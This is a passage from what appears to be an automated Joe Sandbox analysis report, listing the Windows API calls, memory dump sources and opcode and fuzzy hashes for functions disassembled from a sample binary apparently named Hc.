                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00648649,00648649,?,?,?,006567C2,00000001,00000001,8BE85006), ref: 006565CB
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006567C2,00000001,00000001,8BE85006,?,?,?), ref: 00656651
                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0065674B
                                                                  • __freea.LIBCMT ref: 00656758
                                                                    • Part of subcall function 00653B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00646A79,?,0000015D,?,?,?,?,006485B0,000000FF,00000000,?,?), ref: 00653BC5
                                                                  • __freea.LIBCMT ref: 00656761
                                                                  • __freea.LIBCMT ref: 00656786
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1414292761-0
                                                                  • Opcode ID: 56575b067c0591862098f27cc6b2b6e9d868496f3ad85475faf9834f88ca61a4
                                                                  • Instruction ID: baf5ce16f8dba165163fe70d1f49b0c124350baa48d9bcd09dea54b6720c9598
                                                                  • Opcode Fuzzy Hash: 56575b067c0591862098f27cc6b2b6e9d868496f3ad85475faf9834f88ca61a4
                                                                  • Instruction Fuzzy Hash: 6451F2B2600216AFEB258F64CC81EFB77ABEB58755F544668FC04DB240EB35DC58C6A0
                                                                  Function 006AC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006AC10E,?,?), ref: 006AD415
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD451
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4C8
                                                                    • Part of subcall function 006AD3F8: _wcslen.LIBCMT ref: 006AD4FE
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006AC72A
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006AC785
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 006AC7CA
                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006AC7F9
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006AC853
                                                                  • RegCloseKey.ADVAPI32(?), ref: 006AC85F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                  • String ID:
                                                                  • API String ID: 1120388591-0
                                                                  • Opcode ID: dfa9480272f83f74acd8d0208e662ae8a762c3f4d3461ffa8679c9465ed35b2e
                                                                  • Instruction ID: 112c077d91cb73b17ea24eec1557b4dbe2e34a665f0f2d8253700eedf5430e43
                                                                  • Opcode Fuzzy Hash: dfa9480272f83f74acd8d0208e662ae8a762c3f4d3461ffa8679c9465ed35b2e
                                                                  • Instruction Fuzzy Hash: 6F81BF71208641AFD714EF24C884E6ABBE6FF85318F14899CF0594B2A2DB31ED46CF91
                                                                  Function 0068009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(00000035), ref: 006800A9
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00680150
                                                                  • VariantCopy.OLEAUT32(00680354,00000000), ref: 00680179
                                                                  • VariantClear.OLEAUT32(00680354), ref: 0068019D
                                                                  • VariantCopy.OLEAUT32(00680354,00000000), ref: 006801A1
                                                                  • VariantClear.OLEAUT32(?), ref: 006801AB
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCopy$AllocInitString
                                                                  • String ID:
                                                                  • API String ID: 3859894641-0
                                                                  • Opcode ID: e488e9d6f5160691b145b5ee0b6c09ea02d77a86a338c32e63846ac00e78ba0b
                                                                  • Instruction ID: 51744d42adff071f8f5b3e7fa69691686b4fbc3c6cdc1ecf83f2b7a4f17a673c
                                                                  • Opcode Fuzzy Hash: e488e9d6f5160691b145b5ee0b6c09ea02d77a86a338c32e63846ac00e78ba0b
                                                                  • Instruction Fuzzy Hash: 1A512F31500310E6EFD0BF649899B69B3EBEF05310F10994BE905DF296DBB09D49CB59
                                                                  Function 00699B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 006241EA: _wcslen.LIBCMT ref: 006241EF
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00699F2A
                                                                  • _wcslen.LIBCMT ref: 00699F4B
                                                                  • _wcslen.LIBCMT ref: 00699F72
                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00699FCA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$FileName$OpenSave
                                                                  • String ID: X
                                                                  • API String ID: 83654149-3081909835
                                                                  • Opcode ID: e32ccd903280f17a8ce674bfd22f2d64c5beab1c68be514eb813b060b1f92ade
                                                                  • Instruction ID: 88a5dc3f9e7b1c3f08096692c4289a6bd1931ef7e1070f21e61e76b84db87b26
                                                                  • Opcode Fuzzy Hash: e32ccd903280f17a8ce674bfd22f2d64c5beab1c68be514eb813b060b1f92ade
                                                                  • Instruction Fuzzy Hash: D6E192315047109FDB64DF28D881AAAB7E6BF84314F04896DF8898B3A2DB31DD45CF96
                                                                  Function 00696ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00696F21
                                                                  • CoInitialize.OLE32(00000000), ref: 0069707E
                                                                  • CoCreateInstance.OLE32(006C0CC4,00000000,00000001,006C0B34,?), ref: 00697095
                                                                  • CoUninitialize.OLE32 ref: 00697319
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                  • String ID: .lnk
                                                                  • API String ID: 886957087-24824748
                                                                  • Opcode ID: b30908067ff1761b392a33ded8bd752b79f7dcb94090465fc8a91e7978144918
                                                                  • Instruction ID: 1ae9ed19526f1e3b88a3671512ea3fdcb176e755d03166dddccb7e4dafd038c4
                                                                  • Opcode Fuzzy Hash: b30908067ff1761b392a33ded8bd752b79f7dcb94090465fc8a91e7978144918
                                                                  • Instruction Fuzzy Hash: 1AD15771508611AFC340EF24D881AABB7EAEF98704F40496DF5858B262DB71ED45CB92
                                                                  Function 00691196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 006911B3
                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 006911EE
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0069120A
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00691283
                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0069129A
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 006912C8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3368777196-0
                                                                  • Opcode ID: 6af39cf63ce1a4c1021682ab26f96cfcce10f04c5a87973c9d9aba97813f5a3c
                                                                  • Instruction ID: afc0d603d5ec0de6c02bd5d89856ccee928bc89321369517a2286166835afb84
                                                                  • Opcode Fuzzy Hash: 6af39cf63ce1a4c1021682ab26f96cfcce10f04c5a87973c9d9aba97813f5a3c
                                                                  • Instruction Fuzzy Hash: 71416B71900205EFDF04AF94DC85AAAB7BAFF05310F1440A9EE009F296DB30DE91DBA4
                                                                  Function 006B8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0067FBEF,00000000,?,?,00000000,?,006639E2,00000004,00000000,00000000), ref: 006B8CA7
                                                                  • EnableWindow.USER32(?,00000000), ref: 006B8CCD
                                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 006B8D2C
                                                                  • ShowWindow.USER32(?,00000004), ref: 006B8D40
                                                                  • EnableWindow.USER32(?,00000001), ref: 006B8D66
                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 006B8D8A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 642888154-0
                                                                  • Opcode ID: a52f7b5f6986c95c88ef65a38b66c6c3f7f9829556a9b933f77f35789fabbbc7
                                                                  • Instruction ID: 20f2babfb4492abe410b547175daa81550047ce3b1292db0338be82f5f953d34
                                                                  • Opcode Fuzzy Hash: a52f7b5f6986c95c88ef65a38b66c6c3f7f9829556a9b933f77f35789fabbbc7
                                                                  • Instruction Fuzzy Hash: DE41A1B0642245AFDB25DF24C899BE17FF7FF46305F1851A9E5084F2A2CB71A885CB60
                                                                  Function 006A2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 006A2D45
                                                                    • Part of subcall function 0069EF33: GetWindowRect.USER32(?,?), ref: 0069EF4B
                                                                  • GetDesktopWindow.USER32 ref: 006A2D6F
                                                                  • GetWindowRect.USER32(00000000), ref: 006A2D76
                                                                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 006A2DB2
                                                                  • GetCursorPos.USER32(?), ref: 006A2DDE
                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006A2E3C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                  • String ID:
                                                                  • API String ID: 2387181109-0
                                                                  • Opcode ID: 92651ee5f6d3afe0ffc7e218ef0fc2ac7ac5dc45e87b8959319601214f395bb7
                                                                  • Instruction ID: 8fbb130b85850edda7019de25f29b362d16bfee0c88e16e0cc88b725867d8119
                                                                  • Opcode Fuzzy Hash: 92651ee5f6d3afe0ffc7e218ef0fc2ac7ac5dc45e87b8959319601214f395bb7
                                                                  • Instruction Fuzzy Hash: A331D272545316ABC720EF18C845F9BB7AAFF85354F000619F48597182EA30ED49CBE2
                                                                  Function 006855E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 006855F9
                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00685616
                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0068564E
                                                                  • _wcslen.LIBCMT ref: 0068566C
                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00685674
                                                                  • _wcsstr.LIBVCRUNTIME ref: 0068567E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                  • String ID:
                                                                  • API String ID: 72514467-0
                                                                  • Opcode ID: be18949b3d424b08715f3363567c2f5248987329cc2cfabb7d287c4ba5d1a1b6
                                                                  • Instruction ID: 55a1cbfba0eb830a6c4124c1f589887f2842117c2187c902bba8947cfb043122
                                                                  • Opcode Fuzzy Hash: be18949b3d424b08715f3363567c2f5248987329cc2cfabb7d287c4ba5d1a1b6
                                                                  • Instruction Fuzzy Hash: 032126722046007BEB166B64DC49EBB7BAADF45720F14427DF906DA1A1FE71CC818760
                                                                  Function 00696263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00625851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006255D1,?,?,00664B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00625871
                                                                  • _wcslen.LIBCMT ref: 006962C0
                                                                  • CoInitialize.OLE32(00000000), ref: 006963DA
                                                                  • CoCreateInstance.OLE32(006C0CC4,00000000,00000001,006C0B34,?), ref: 006963F3
                                                                  • CoUninitialize.OLE32 ref: 00696411
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                  • String ID: .lnk
                                                                  • API String ID: 3172280962-24824748
                                                                  • Opcode ID: bc6c73ebd4286a4fe283406dc614d64d5157ff2e612eeefea174154b1f635d0e
                                                                  • Instruction ID: 67d1ac034f6d846bf6afbdd5a9e39e5db88173e09ee2473b658b8e59f518d05f
                                                                  • Opcode Fuzzy Hash: bc6c73ebd4286a4fe283406dc614d64d5157ff2e612eeefea174154b1f635d0e
                                                                  • Instruction Fuzzy Hash: B0D14371A043119FCB14DF24C484A6ABBEAFF89714F15895DF8869B361CB31EC45CB92
                                                                  Function 006436F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,006436E9,00643355), ref: 00643700
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0064370E
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00643727
                                                                  • SetLastError.KERNEL32(00000000,?,006436E9,00643355), ref: 00643779
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 3852720340-0
                                                                  • Opcode ID: 0823cc91b2a27423428253879c8f05676a7dade2b22e226e40001f14ec5c760f
                                                                  • Instruction ID: 565258fad418d311a764d9cee3a982b963b0b1cea0336bfb0225c2da0dceaafb
                                                                  • Opcode Fuzzy Hash: 0823cc91b2a27423428253879c8f05676a7dade2b22e226e40001f14ec5c760f
                                                                  • Instruction Fuzzy Hash: FF014CF254E3316EA7642BB5BCC65A72A97EB05775724032DF150493F2EF114E029148
                                                                  Function 006530E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,00644D53,00000000,?,?,006468E2,?,?,00000000), ref: 006530EB
                                                                  • _free.LIBCMT ref: 0065311E
                                                                  • _free.LIBCMT ref: 00653146
                                                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 00653153
                                                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 0065315F
                                                                  • _abort.LIBCMT ref: 00653165
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free$_abort
                                                                  • String ID:
                                                                  • API String ID: 3160817290-0
                                                                  • Opcode ID: 5762263e0fdd8ea515ecd288fddc9110af4225ace0862b488f5cca6d5daf11ec
                                                                  • Instruction ID: 591b003938ae7ae47e788cf653f9a315f549cd556916e5eb3a132728c22a388c
                                                                  • Opcode Fuzzy Hash: 5762263e0fdd8ea515ecd288fddc9110af4225ace0862b488f5cca6d5daf11ec
                                                                  • Instruction Fuzzy Hash: DFF0F975500A1167C3712735AC06A9A32679FD2BF3F25051CFD14D63D2FE208A4E4165
                                                                  Function 006B9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00621F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00621F87
                                                                    • Part of subcall function 00621F2D: SelectObject.GDI32(?,00000000), ref: 00621F96
                                                                    • Part of subcall function 00621F2D: BeginPath.GDI32(?), ref: 00621FAD
                                                                    • Part of subcall function 00621F2D: SelectObject.GDI32(?,00000000), ref: 00621FD6
                                                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 006B94AA
                                                                  • LineTo.GDI32(?,00000003,00000000), ref: 006B94BE
                                                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 006B94CC
                                                                  • LineTo.GDI32(?,00000000,00000003), ref: 006B94DC
                                                                  • EndPath.GDI32(?), ref: 006B94EC
                                                                  • StrokePath.GDI32(?), ref: 006B94FC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                  • String ID:
                                                                  • API String ID: 43455801-0
                                                                  • Opcode ID: c81e4793a2fd89589ffb3dfb503fe6ed48e3cd8c2bd185f716c44cec02d1125c
                                                                  • Instruction ID: e6e176e2e556a9b26a7402c8807f48782a69c17bffa03aa701028d893d751ed8
                                                                  • Opcode Fuzzy Hash: c81e4793a2fd89589ffb3dfb503fe6ed48e3cd8c2bd185f716c44cec02d1125c
                                                                  • Instruction Fuzzy Hash: 711109B600010DBFDB129F90DC88EEA7FAEEB08364F049111BA194A161D7719D95DFA0
                                                                  Function 00685B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 00685B7C
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00685B8D
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00685B94
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00685B9C
                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00685BB3
                                                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00685BC5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Release
                                                                  • String ID:
                                                                  • API String ID: 1035833867-0
                                                                  • Opcode ID: 997d279920ac114af54fa85c7a92c20fa544989364927d48a8d05c5cd2ca5828
                                                                  • Instruction ID: c8111df17d366f51e7613e8874e4fa12b0fb1a0aa82b9499efe596d5bb3ea286
                                                                  • Opcode Fuzzy Hash: 997d279920ac114af54fa85c7a92c20fa544989364927d48a8d05c5cd2ca5828
